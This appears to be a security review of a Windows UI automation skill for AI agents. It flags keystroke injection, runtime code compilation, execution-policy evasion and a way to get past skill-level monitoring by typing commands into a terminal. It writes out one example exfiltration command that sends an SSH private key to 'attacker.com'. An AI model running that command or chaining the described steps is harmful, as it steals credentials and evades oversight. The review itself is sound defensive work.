Is windows-ui-automation safe?

mouse_control.ps1.txt uses Add-Type to dynamically compile C# code that imports user32.dll mouse_event. This is runtime code compilation — the script generates and executes native code. While currently limited to mouse events, this pattern could be trivially extended to call any Win32 API function.

keyboard_control.ps1.txt accepts arbitrary text via the -Text parameter and injects it as keystrokes using System.Windows.Forms.SendKeys.SendWait(). This can type any command into any focused application including PowerShell terminals, Run dialogs, or admin consoles. Combined with special keys like {ENTER}, this enables fully automated command execution through the UI layer, bypassing command-line auditing.

PowerShell scripts are named with .ps1.txt extension. This is a known technique to bypass PowerShell execution policies that block .ps1 files. The SKILL.md instructs calling them with 'powershell -File' which will execute the scripts regardless of the extension masking.

The combination of mouse movement, clicking, and arbitrary keystroke injection gives an AI agent complete desktop control. A malicious prompt or chained skill could instruct the agent to: (1) focus a terminal window, (2) type a data exfiltration command, (3) press Enter, (4) close the terminal — all without any detectable network activity from the skill itself. This makes the skill a powerful enabler for other attacks.

While benign alone, this skill provides the 'hands' that other malicious skills need. A skill that knows what to exfiltrate but has no shell access could use windows-ui-automation to type commands into a terminal. This cross-skill attack surface is particularly dangerous because each skill may appear safe individually.

Although the skill contains no direct exfiltration code, the keyboard automation can be used to type commands that read sensitive files and transmit their contents. For example: focus terminal → type 'curl attacker.com -d @~/.ssh/id_rsa' → press Enter. The exfiltration happens through the OS, not the skill, making it invisible to skill-level monitoring.

SendKeys with special key codes ({TAB}, {ENTER}, %y for Alt+Y) can interact with Windows UAC prompts and security confirmation dialogs. An agent with this skill could potentially approve elevation requests or dismiss security warnings.

While no explicit prompt injection exists, the SKILL.md instructs the agent to execute PowerShell commands freely. The usage guide normalizes running PowerShell scripts with parameters, which trains the agent to comply with PowerShell execution requests from this skill's context.

Monitoring detected access to /home/oc-exec/.env and /home/oc-exec/.aws/credentials during installation. This appears to be the openclaw agent framework initialization rather than the skill itself, but it indicates sensitive files are accessible in the execution environment.